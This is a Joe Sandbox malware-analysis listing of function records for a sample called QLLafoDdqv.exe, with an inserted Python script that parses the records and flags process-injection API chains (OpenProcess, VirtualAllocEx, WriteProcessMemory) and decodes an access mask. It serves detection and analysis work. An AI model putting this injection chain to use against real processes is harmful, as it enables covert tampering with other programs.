              • Opcode Fuzzy Hash: 0f81a31bd8689fa68dc575c3425c8eeb05d34f62aca6fce8d24d84c54243a275
              • Instruction Fuzzy Hash: 2DF0CD75300305FBEB221FA5EC49F663BADEF8A761F104414FA86D7251CAB9DC408A60
              APIs
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 00740324
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 00740331
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 0074033E
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 0074034B
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 00740358
              • CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 00740365
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID:
              • API String ID: 2962429428-0
              • Opcode ID: dabc9760f0d1e328b93be0c955742ab23f928549967abec637c6dfb23f06a861
              • Instruction ID: 3f6611560d59635a3a03326f2c90280cac5449067e5e6fd0d641e1f9ee46be24
              • Opcode Fuzzy Hash: dabc9760f0d1e328b93be0c955742ab23f928549967abec637c6dfb23f06a861
              • Instruction Fuzzy Hash: 6001AA72800B159FCB30AF66D890812FBF9BF603153168A3FD29652931C3B5A998CF80
              APIs
              • _free.LIBCMT ref: 0070D752
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 0070D764
              • _free.LIBCMT ref: 0070D776
              • _free.LIBCMT ref: 0070D788
              • _free.LIBCMT ref: 0070D79A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 05bd93dfe6b6ff00b926000bcb69be2d69dab3930f38094c9fab66d70934ceeb
              • Instruction ID: 9dee420b74a19c28a0cf68e3014b8fe77ed44d2d56ce4267b9c84261ee963315
              • Opcode Fuzzy Hash: 05bd93dfe6b6ff00b926000bcb69be2d69dab3930f38094c9fab66d70934ceeb
              • Instruction Fuzzy Hash: 85F0FF33554304EBCA22EBA8F9CAC1677DDBB447107A55A06F048E7592C72CFC818AA4
              APIs
              • _free.LIBCMT ref: 007022BE
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 007022D0
              • _free.LIBCMT ref: 007022E3
              • _free.LIBCMT ref: 007022F4
              • _free.LIBCMT ref: 00702305
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: fcda286688f572c2476941eec2ee46e91bee4a3a2c3b8cdbb08364ee3692b88e
              • Instruction ID: 538939280bcdae49d0ffc4aac9c2f3564cc9ef2b9bbf295d0578a20915657fd0
              • Opcode Fuzzy Hash: fcda286688f572c2476941eec2ee46e91bee4a3a2c3b8cdbb08364ee3692b88e
              • Instruction Fuzzy Hash: A0F01D76520110CFCA12AF54BC099483AA4B75A750B918607F410E22F2C73C58129EEC
              APIs
              • EndPath.GDI32(?), ref: 006E95D4
              • StrokeAndFillPath.GDI32(?,?,007271F7,00000000,?,?,?), ref: 006E95F0
              • SelectObject.GDI32(?,00000000), ref: 006E9603
              • DeleteObject.GDI32 ref: 006E9616
              • StrokePath.GDI32(?), ref: 006E9631
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Path$ObjectStroke$DeleteFillSelect
              • String ID:
              • API String ID: 2625713937-0
              • Opcode ID: 854d9afc285e5aeb5706be3b855f6f29f0a8b6c6dc84535a4e252d34981f427e
              • Instruction ID: b5ce68a412ee71cd8e1b9f91f7f512db826cc82eeeb8c7a37272f2fdb649e6c5
              • Opcode Fuzzy Hash: 854d9afc285e5aeb5706be3b855f6f29f0a8b6c6dc84535a4e252d34981f427e
              • Instruction Fuzzy Hash: 07F08C30006388EBEB165F26EC1C7B63B62AB82322F40C215F466561F0C7789995CF29
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: __freea$_free
              • String ID: a/p$am/pm
              • API String ID: 3432400110-3206640213
              • Opcode ID: 8f9228bec59e0be2e21d2c6cf12a834855b76cb223000d622c16db28d5693851
              • Instruction ID: f59501ca3bff1eb1902d25173fea9d3145c05ce0c0111ec3d89762ef91c33f08
              • Opcode Fuzzy Hash: 8f9228bec59e0be2e21d2c6cf12a834855b76cb223000d622c16db28d5693851
              • Instruction Fuzzy Hash: 28D1E231A00206DADB289F68C895BFAB7F5FF06300FA44359E9419BAD1D77D9D80CB91
              APIs
                • Part of subcall function 006F0242: EnterCriticalSection.KERNEL32(007A070C,007A1884,?,?,006E198B,007A2518,?,?,?,006D12F9,00000000), ref: 006F024D
                • Part of subcall function 006F0242: LeaveCriticalSection.KERNEL32(007A070C,?,006E198B,007A2518,?,?,?,006D12F9,00000000), ref: 006F028A
                • Part of subcall function 006F00A3: __onexit.LIBCMT ref: 006F00A9
              • __Init_thread_footer.LIBCMT ref: 00756238
                • Part of subcall function 006F01F8: EnterCriticalSection.KERNEL32(007A070C,?,?,006E8747,007A2514), ref: 006F0202
                • Part of subcall function 006F01F8: LeaveCriticalSection.KERNEL32(007A070C,?,006E8747,007A2514), ref: 006F0235
                • Part of subcall function 0074359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007435E4
                • Part of subcall function 0074359C: LoadStringW.USER32(007A2390,?,00000FFF,?), ref: 0074360A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
              • String ID: x#z$x#z$x#z
              • API String ID: 1072379062-95117334
              • Opcode ID: 007c4ce0fe769edc934058690f9fdf1cf37f72434fbdb06bfc922d03a69b1c91
              • Instruction ID: 8b1edf8fdd13303a947bf98e78c5fdfb1ed04b986ba59170ab6b6999fc18f95c
              • Opcode Fuzzy Hash: 007c4ce0fe769edc934058690f9fdf1cf37f72434fbdb06bfc922d03a69b1c91
              • Instruction Fuzzy Hash: 03C17C71A00209ABDB14DF58C890EFEB7BAFF49310F508069F9059B251DBB9ED59CB90
              APIs
              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00708B6E
              • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00708B7A
              • __dosmaperr.LIBCMT ref: 00708B81
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharErrorLastMultiWide__dosmaperr
              • String ID: .o
              • API String ID: 2434981716-1957372423
              • Opcode ID: 27bc20ebc43ff8967df9d345e5f475be9bad67234389b4f5184bf7201c28b367
              • Instruction ID: 4b8cc92f4234fc1a2cf0ba61a188741f996c605d07aa566b67c6004a077d3e88
              • Opcode Fuzzy Hash: 27bc20ebc43ff8967df9d345e5f475be9bad67234389b4f5184bf7201c28b367
              • Instruction Fuzzy Hash: AF418CF0604155EFCB659F64C880A7D7FE6DF86304B2887A9F4C587682DE398C028795
              APIs
                • Part of subcall function 0073B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007321D0,?,?,00000034,00000800,?,00000034), ref: 0073B42D
              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00732760
                • Part of subcall function 0073B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0073B3F8
                • Part of subcall function 0073B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0073B355
                • Part of subcall function 0073B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00732194,00000034,?,?,00001004,00000000,00000000), ref: 0073B365
                • Part of subcall function 0073B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00732194,00000034,?,?,00001004,00000000,00000000), ref: 0073B37B
              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007327CD
              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0073281A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
              • String ID: @
              • API String ID: 4150878124-2766056989
              • Opcode ID: eac3997c4ef64c4269b5cdeff22c686b0cda9324d02086de95a1065d277f8673
              • Instruction ID: 0a9c8692b59d17b0ea48739fd9bb4e5d2040e7ad31b27f652f0bceb64923a82b
              • Opcode Fuzzy Hash: eac3997c4ef64c4269b5cdeff22c686b0cda9324d02086de95a1065d277f8673
              • Instruction Fuzzy Hash: 19412E76901218BFEB10DFA4CD45AEEBBB8EF09700F104099FA55B7182DB746E45CBA1
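The record above is the one in this listing that matters most to an analyst: a single function whose call set includes GetWindowThreadProcessId, OpenProcess, VirtualAllocEx, WriteProcessMemory and ReadProcessMemory, i.e. everything needed to place data in another process and read it back. The following script is an added example, not Joe Sandbox tooling or code from the sample: it parses the repeated "APIs" / "Similarity" blocks of this report into records, flags the records whose call set can write into a foreign process, and decodes the OpenProcess access mask that the report prints as a raw hex argument (00000438 here). The embedded input is three records copied from this page and trimmed to the lines the parser reads; the line format it assumes ("• Name.MODULE(args), ref: ADDR", with an optional "Part of subcall function XXXX:" prefix) is the one used throughout this section.

```python
"""Parse Joe Sandbox function records (the repeated 'APIs' / 'Similarity'
blocks in this report) and flag functions whose call set can write into
another process. Added example, not Joe Sandbox tooling."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import List

# Constructed input: three records copied from this report's function
# listing, trimmed to the lines the parser reads.
SAMPLE = r"""APIs
• CloseHandle.KERNEL32(?,?,?,?,0074017D,?,007432FC,?,00000001,00712592,?), ref: 00740324
Similarity
• API ID: CloseHandle
• Opcode ID: dabc9760f0d1e328b93be0c955742ab23f928549967abec637c6dfb23f06a861
APIs
  • Part of subcall function 0073B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007321D0,?,?,00000034,00000800,?,00000034), ref: 0073B42D
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00732760
  • Part of subcall function 0073B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0073B3F8
  • Part of subcall function 0073B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0073B355
  • Part of subcall function 0073B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00732194,00000034,?,?,00001004,00000000,00000000), ref: 0073B365
  • Part of subcall function 0073B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00732194,00000034,?,?,00001004,00000000,00000000), ref: 0073B37B
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• Opcode ID: eac3997c4ef64c4269b5cdeff22c686b0cda9324d02086de95a1065d277f8673
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\QLLafoDdqv.exe,00000104), ref: 00701769
Similarity
• API ID: _free$FileModuleName
• Opcode ID: 8f219d75a4ff58c022a9be24b0c004762cd65d40b0b89a7f3044198a0faba532
"""

# One "• Name.MODULE(args), ref: ADDR" line. The parentheses are optional
# because the report also prints e.g. "DeleteObject.GDI32 ref: 006E9616".
CALL_RE = re.compile(
    r"^\s*•\s*(?P<nested>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)

# PROCESS_* access bits from winnt.h; the report prints the mask as raw hex.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00100000: "SYNCHRONIZE",
}

# Open + allocate + write is the minimum needed to place data in another process.
INJECTION_SET = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    nested: bool  # "Part of subcall function": the call is made by a callee


@dataclass
class FunctionRecord:
    calls: List[Call] = field(default_factory=list)
    api_id: str = ""
    opcode_id: str = ""


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text at each 'APIs' header and collect the call lines
    plus the API ID / Opcode ID fields of the Similarity block that follows."""
    records: List[FunctionRecord] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append(FunctionRecord())
            continue
        if not records:
            continue
        if line.startswith("• API ID:"):
            records[-1].api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Opcode ID:"):
            records[-1].opcode_id = line.split(":", 1)[1].strip()
        elif (m := CALL_RE.match(raw)):
            args = m["args"].split(",") if m["args"] is not None else []
            records[-1].calls.append(
                Call(m["api"], m["module"], args, m["ref"], bool(m["nested"])))
    return records


def decode_process_access(mask: int) -> List[str]:
    """Name the PROCESS_* bits set in an OpenProcess desired-access mask."""
    names = [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    if leftover:
        names.append(f"0x{leftover:X}")  # bits this table does not know
    return names


def find_cross_process_writers(records: List[FunctionRecord]):
    """Return (opcode_id, sorted API names, decoded OpenProcess masks) for each
    record that opens a process, allocates in it and writes to it."""
    hits = []
    for rec in records:
        apis = {c.api for c in rec.calls}
        if not INJECTION_SET <= apis:
            continue
        masks = [decode_process_access(int(c.args[0], 16)) for c in rec.calls
                 if c.api == "OpenProcess" and c.args
                 and re.fullmatch(r"[0-9A-Fa-f]+", c.args[0])]
        hits.append((rec.opcode_id, sorted(apis), masks))
    return hits


if __name__ == "__main__":
    for opcode_id, apis, masks in find_cross_process_writers(parse_records(SAMPLE)):
        print(opcode_id[:16], apis, masks)
```

The mask 00000438 decodes to PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, exactly the rights VirtualAllocEx, WriteProcessMemory and ReadProcessMemory need and nothing more. Two caveats when reading the hits: calls marked "Part of subcall function" are made by callees, so the hit is attributed to the calling function's Opcode ID rather than to the function that contains the OpenProcess; and the script flags capability, not intent. The binary is a compiled AutoIt script, and this open/allocate/write/read chain also appears in the runtime's own helpers for reading window controls of other processes, so a hit here should be read together with the behavioural signatures at the top of the report ("Writes to foreign memory regions", "Maps a DLL or memory area into another process") rather than on its own.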
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\QLLafoDdqv.exe,00000104), ref: 00701769
              • _free.LIBCMT ref: 00701834
              • _free.LIBCMT ref: 0070183E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\Desktop\QLLafoDdqv.exe
              • API String ID: 2506810119-2112601532
              • Opcode ID: 8f219d75a4ff58c022a9be24b0c004762cd65d40b0b89a7f3044198a0faba532
              • Instruction ID: 6a91dd4f0997c32a4051d17be47ffe5fb5802b1ed42516ec18b0040fd737edcd
              • Opcode Fuzzy Hash: 8f219d75a4ff58c022a9be24b0c004762cd65d40b0b89a7f3044198a0faba532
              • Instruction Fuzzy Hash: 93318F75A00218EFDB21DF999885D9EBBFCEB85320F948266F50497291D6B88E40CB90
              APIs
              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0073C306
              • DeleteMenu.USER32(?,00000007,00000000), ref: 0073C34C
              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007A1990,01744FD0), ref: 0073C395
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Menu$Delete$InfoItem
              • String ID: 0
              • API String ID: 135850232-4108050209
              • Opcode ID: 0aed95ff483f9672e61020b49c67e7d57b4b147433279959c10424b1bdf85d69
              • Instruction ID: 52404b56cc1800c8b4f3a20fb988fd5bce5d133b8ad8112c27d4d6a937269518
              • Opcode Fuzzy Hash: 0aed95ff483f9672e61020b49c67e7d57b4b147433279959c10424b1bdf85d69
              • Instruction Fuzzy Hash: 6A41B1312043019FE721DF24D885B2ABBE4AF85310F10861DF9A6A72D2D778E904CB63
              APIs
              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0076CC08,00000000,?,?,?,?), ref: 007644AA
              • GetWindowLongW.USER32 ref: 007644C7
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007644D7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Long
              • String ID: SysTreeView32
              • API String ID: 847901565-1698111956
              • Opcode ID: 7708319bc41d90098ebf21d0d9d63f8a695fc6c4473551456fb7d89b8a62e06e
              • Instruction ID: bbcbfaec3b4b626f7807ba028c04e00a1d52810532d0e072372c81a13214ff0f
              • Opcode Fuzzy Hash: 7708319bc41d90098ebf21d0d9d63f8a695fc6c4473551456fb7d89b8a62e06e
              • Instruction Fuzzy Hash: 5231B031210245AFDF218E38DC46BEA7BA9EB09334F204319FD76A21D1DB78EC609B54
              APIs
              • SysReAllocString.OLEAUT32(?,?), ref: 00736EED
              • VariantCopyInd.OLEAUT32(?,?), ref: 00736F08
              • VariantClear.OLEAUT32(?), ref: 00736F12
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$AllocClearCopyString
              • String ID: *js
              • API String ID: 2173805711-2626009487
              • Opcode ID: 0d75b4065e026734700bb5360326a6fc620bdca79412f94b3b0d024d0dbca17e
              • Instruction ID: 48b268d46495c9335c4d7145dbfba7f0ec4550f085271a6b035fd0b0a9ba48e8
              • Opcode Fuzzy Hash: 0d75b4065e026734700bb5360326a6fc620bdca79412f94b3b0d024d0dbca17e
              • Instruction Fuzzy Hash: AE31D371A04246EFDB05AF64E8509BD3776FF40700F108499F8065B3A2CB389911DBD8
              APIs
                • Part of subcall function 0075335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00753077,?,?), ref: 00753378
              • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0075307A
              • _wcslen.LIBCMT ref: 0075309B
              • htons.WSOCK32(00000000,?,?,00000000), ref: 00753106
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
              • String ID: 255.255.255.255
              • API String ID: 946324512-2422070025
              • Opcode ID: cfd413a5f80bfbf8e6e48fe0957819c9fc4c5206f30d1741d1fc8c6a4cbcaa3b
              • Instruction ID: 8bae0f3703246e86e44192611dcd425c063d6304dd19da8dd8a0a0903365b90a
              • Opcode Fuzzy Hash: cfd413a5f80bfbf8e6e48fe0957819c9fc4c5206f30d1741d1fc8c6a4cbcaa3b
              • Instruction Fuzzy Hash: 5231D2356007099FCB20CF28C485EAA77E1EF14395F248059EC198B3A2DBBADE49C760
              APIs
              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00764705
              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00764713
              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0076471A
              Strings
              Memory Dump Source
